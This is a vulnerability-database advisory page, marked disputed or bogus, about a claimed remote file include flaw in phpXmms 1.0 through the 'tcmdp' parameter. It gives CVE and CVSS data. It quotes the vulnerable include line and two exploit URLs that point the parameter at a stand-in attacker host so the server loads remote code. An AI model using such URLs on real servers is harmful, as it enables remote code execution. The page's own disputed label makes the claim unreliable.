Bogus: phpXmms 1.0 (tcmdp) Remote File Include Vulnerabilities ( Ascii Version )

Search:
WLB2

Disputed / BOGUS
phpXmms 1.0 (tcmdp) Remote File Include Vulnerabilities

Published
Credit
Risk
2007.02.22
ilker Kandemir
High
CWE
CVE
Local
Remote
N/A
CVE-2007-1053
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
10/10
10/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Complete
Complete
Complete

------------------------------------------------------------------------
-------------------------------------------

AYYILDIZ.ORG PreSents...

Script: phpXmms 1.0
Script Download: ftp://ftp.warpedsystems.sk.ca/pub/php/phpxmms-1.0.tar.gz

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
include($tcmdp);

------------------------------------------------------------------------
-------------------------------------------

Exploit: phpxmmsb.php?tcmdp=http://attacker.txt?
phpxmmst.php?tcmdp=http://attacker.txt?

------------------------------------------------------------------------
-------------------------------------------

Tnx:H0tturk,Asianeagle,ajann,Str0ke .
Special Tnx: AYYILDIZ.ORG

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version